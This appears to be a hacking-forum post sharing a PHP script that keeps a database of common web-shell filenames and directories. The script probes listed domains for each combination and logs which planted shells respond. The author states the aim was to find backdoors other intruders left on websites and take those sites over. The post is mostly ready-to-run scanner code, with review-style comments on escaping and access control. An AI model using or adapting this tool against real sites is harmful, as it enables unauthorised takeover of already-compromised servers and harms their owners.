Thread Contributor: ubersaki — Shell Finder with database logging
Here's another old script of mine I never released. I also lost the database, so you would have to sort through the code and make the DB, which is rather easy.

A basic idea of what's going on here so you can understand it... I went on a hunt for uploaded shells and recorded the filenames, along with the directories they were kept in (because people usually put them in the same place on every site) and put that info into the database. Then, I would run this against a domain and it will record all found shells. Then, I took that shit over. :)

Code:
<a href="?addurl">Add URL</a>  |  <a href="?adddir">Add Directory</a>  |  <a href="?addshell">Add Shell</a>  |  <a href="?scan">Scan Urls</a>
<br />
<br />

<?php
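$dbuser = "xxxxx";
$dbpass = "xxxxx";
$debase = "sfinder_main";

// NOTE(review): the mysql_* extension was removed in PHP 7, so this file only
// runs on PHP <= 5.6. Moving to PDO with prepared statements is the real fix
// for the string-built queries further down.
//
// Abort when the connection or database selection fails instead of letting
// every later query fail one by one. The driver's message goes to the server
// log, not to the browser, so database details are not disclosed.
if (!mysql_connect("localhost", $dbuser, $dbpass)) {
    error_log("sfinder: database connection failed: " . mysql_error());
    die("Database unavailable");
}
if (!mysql_select_db($debase)) {
    error_log("sfinder: cannot select database " . $debase . ": " . mysql_error());
    die("Database unavailable");
}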


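/**
 * Fetch $url with a short timeout and append it to found.txt when the
 * server answers with a 2xx status.
 *
 * The only "found" signal is the status class, so a host that answers 200
 * for any path (a soft 404) yields false positives; entries in found.txt
 * still need manual confirmation. The transfer body is discarded.
 *
 * @param string $url absolute URL to request
 * @return void
 */
function checkStatus($url){
    $agent = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; pt-pt) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27";

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    // return the body instead of printing it into the page; only the status code is used
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_VERBOSE, false);
    // per-request ceiling so one unresponsive host cannot stall the whole scan
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);

    curl_exec($ch);
    // 0 when the transfer itself failed (timeout, DNS, refused); that is outside 2xx
    $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($httpcode < 200 || $httpcode >= 300) {
        return;
    }

    // $url is assembled from rows that were typed into the web forms, so it is
    // user-controlled text and must be escaped before it is echoed as HTML
    echo $httpcode . "- Shell Found - " . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . "<br />";

    // found.txt is opened with a relative path, which for a web script normally
    // resolves next to the script, i.e. inside the document root; anyone who can
    // reach this page can then read the file. Keep it outside the web root.
    $file = fopen('found.txt', 'a');
    if ($file === false) {
        error_log("sfinder: cannot open found.txt for appending");
        return;
    }
    fwrite($file, $url . "\n");
    // close the handle so each hit does not leak a file descriptor
    fclose($file);
    flush();
}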




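/**
 * Insert $dir into dirnames unless it is empty or already present.
 *
 * Echoes "<dir> - Added<br />" after a successful insert and stays silent
 * when the row already exists. Dies on insert failure; the driver message
 * is written to the server log rather than the response.
 *
 * @param string $dir directory prefix as submitted through the form
 * @return void
 */
function addDir($dir){
    if ($dir === "") {
        return;
    }
    // $dir comes straight from POST; escape it for the string-built query.
    // mysql_real_escape_string uses the connection opened at the top of the file.
    $safeDir = mysql_real_escape_string($dir);

    $query = mysql_query("SELECT dir FROM dirnames WHERE dir = '" . $safeDir . "'");
    $result = mysql_fetch_array($query);
    if (!empty($result)) {
        return;
    }

    $addIt = mysql_query("INSERT INTO dirnames (dir) VALUES ('" . $safeDir . "')");
    if ($addIt === false) {
        error_log("sfinder: insert into dirnames failed: " . mysql_error());
        die("error updating row");
    }
    // user-supplied value echoed into HTML, so escape it
    echo htmlspecialchars($dir, ENT_QUOTES, 'UTF-8') . " - Added<br />";
}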
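/**
 * Insert $shell into shellnames unless it is empty or already present.
 *
 * The empty-string guard mirrors addDir(); without it a blank textarea line
 * stores an empty sname row, which later makes the scan request url.dir with
 * no filename at all. Echoes "<shell> - Added<br />" on insert, dies on
 * insert failure with the driver message logged server-side.
 *
 * @param string $shell file name as submitted through the form
 * @return void
 */
function addShell($shell){
    if ($shell === "") {
        return;
    }
    // POST-sourced value; escape it for the string-built query
    $safeShell = mysql_real_escape_string($shell);

    $query = mysql_query("SELECT sname FROM shellnames WHERE sname = '" . $safeShell . "'");
    $result = mysql_fetch_array($query);
    if (!empty($result)) {
        return;
    }

    $addIt = mysql_query("INSERT INTO shellnames (sname) VALUES ('" . $safeShell . "')");
    if ($addIt === false) {
        error_log("sfinder: insert into shellnames failed: " . mysql_error());
        die("error updating row");
    }
    echo htmlspecialchars($shell, ENT_QUOTES, 'UTF-8') . " - Added<br />";
}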
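/**
 * Insert $url into the url table unless it is empty or already present.
 *
 * New rows rely on the column default for `checked` (the scan selects
 * rows where checked = ''). Echoes "<url> - Added<br />" on insert and
 * dies on insert failure with the driver message logged server-side.
 *
 * @param string $url base URL as submitted through the form
 * @return void
 */
function addUrl($url){
    if ($url === "") {
        return;
    }
    // POST-sourced value; escape it for the string-built query
    $safeUrl = mysql_real_escape_string($url);

    $query = mysql_query("SELECT url FROM url WHERE url = '" . $safeUrl . "'");
    $result = mysql_fetch_array($query);
    if (!empty($result)) {
        return;
    }

    $addIt = mysql_query("INSERT INTO url (url) VALUES ('" . $safeUrl . "')");
    if ($addIt === false) {
        error_log("sfinder: insert into url failed: " . mysql_error());
        die("error updating row");
    }
    echo htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . " - Added<br />";
}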
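/**
 * Mark $url as checked so the next scan skips it.
 *
 * A failed UPDATE is logged rather than ignored; the scan itself carries on.
 *
 * @param string $url base URL exactly as stored in the url table
 * @return void
 */
function wasChecked($url){
    // the value originates from a form submission, so escape it for the query
    $query = "UPDATE url SET checked = 'yes' WHERE url = '" . mysql_real_escape_string($url) . "'";
    if (mysql_query($query) === false) {
        error_log("sfinder: could not mark url as checked: " . mysql_error());
    }
}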
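/**
 * Split a textarea submission into lines, strip all whitespace from each
 * line and pass every non-empty result to $adder.
 *
 * Because every whitespace character is removed, a value that legitimately
 * contains spaces cannot be entered through the forms.
 *
 * @param string   $text  raw textarea contents
 * @param callable $adder one of addDir/addShell/addUrl
 * @return void
 */
function ingestPostedLines($text, $adder)
{
    foreach (explode("\n", $text) as $line) {
        $clean = preg_replace('/\s+/', '', $line);
        if ($clean !== '') {
            $adder($clean);
        }
    }
}

/**
 * Handle one "add" page: ingest posted lines, print the form, then list the
 * current rows of $table.$column.
 *
 * Posted lines are processed before the list is rendered so an entry added
 * on this request already appears in the list.
 *
 * @param string   $action      query flag naming this page (form target)
 * @param string   $field       textarea name carrying the posted lines
 * @param string   $heading     text of the <h1> above the list
 * @param string   $table       table to list; a literal chosen by the dispatch, never user input
 * @param string   $column      column to print, one value per line; literal as well
 * @param callable $adder       addDir/addShell/addUrl, called once per cleaned line
 * @param bool     $showChecked also print the row's `checked` flag (url page only)
 * @return void
 */
function renderAddPage($action, $field, $heading, $table, $column, $adder, $showChecked = false)
{
    if (isset($_POST[$field])) {
        ingestPostedLines($_POST[$field], $adder);
    }

    echo "<form action=\"?" . $action . "\" method=\"post\">
        <textarea name=\"" . $field . "\" id=\"" . $field . "\" cols=\"45\" rows=\"8\"></textarea><br>
<input type=\"submit\" value=\"submit\" id=\"btn\"></form><br /><br />
";
    echo "<h1>" . $heading . "</h1>";

    $result = mysql_query("SELECT * FROM " . $table . " ORDER BY " . $column . " ASC");
    if ($result === false) {
        error_log("sfinder: listing " . $table . " failed: " . mysql_error());
        return;
    }
    while ($row = mysql_fetch_array($result)) {
        // rows were typed into the forms by users, so escape before echoing as HTML
        $line = htmlspecialchars($row[$column], ENT_QUOTES, 'UTF-8');
        if ($showChecked) {
            $line .= " Checked: " . htmlspecialchars($row['checked'], ENT_QUOTES, 'UTF-8') . " ";
        }
        echo $line . "<br />";
    }
}

/**
 * Run $query and collect $column from every row into a list.
 *
 * @param string $query  SELECT statement built from literals only
 * @param string $column column to extract
 * @return string[] values in result order; empty when the query fails (logged)
 */
function fetchColumn($query, $column)
{
    $values = array();
    $result = mysql_query($query);
    if ($result === false) {
        error_log("sfinder: query failed: " . mysql_error());
        return $values;
    }
    while ($row = mysql_fetch_assoc($result)) {
        $values[] = $row[$column];
    }
    return $values;
}

/**
 * Request every unchecked url combined with every dir and shell name, then
 * mark each url as checked.
 *
 * Output comes from checkStatus() as hits occur. A url is only marked when at
 * least one combination exists, so urls entered before any dirs/shells are
 * not silently retired from future scans.
 *
 * @return void
 */
function runScan()
{
    $thedirs = fetchColumn("SELECT * FROM dirnames", 'dir');
    $theshells = fetchColumn("SELECT * FROM shellnames", 'sname');
    $theurls = fetchColumn("SELECT * FROM url WHERE checked = '' ORDER BY url ASC", 'url');

    // one UPDATE per url, after all its combinations, instead of one per request
    $canMark = count($thedirs) > 0 && count($theshells) > 0;

    foreach ($theurls as $url) {
        foreach ($thedirs as $dir) {
            foreach ($theshells as $shell) {
                checkStatus($url . $dir . $shell);
            }
        }
        if ($canMark) {
            wasChecked($url);
        }
    }
}

// NOTE(review): none of the handlers below check who the caller is, and the
// POST forms carry no CSRF token. Anyone who can reach this script can add
// rows or start a scan; put it behind access control (and keep it out of any
// public site) before it is deployed. Only the presence of the GET flag is
// tested, its value is never read.
if (isset($_GET['adddir'])) {
    renderAddPage('adddir', 'thedirtoadd', 'Current Directories', 'dirnames', 'dir', 'addDir');
} elseif (isset($_GET['addshell'])) {
    renderAddPage('addshell', 'theshelltoadd', 'Current Shells', 'shellnames', 'sname', 'addShell');
} elseif (isset($_GET['addurl'])) {
    renderAddPage('addurl', 'theurltoadd', 'Current urls', 'url', 'url', 'addUrl', true);
} elseif (isset($_GET['scan'])) {
    runScan();
}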
?>

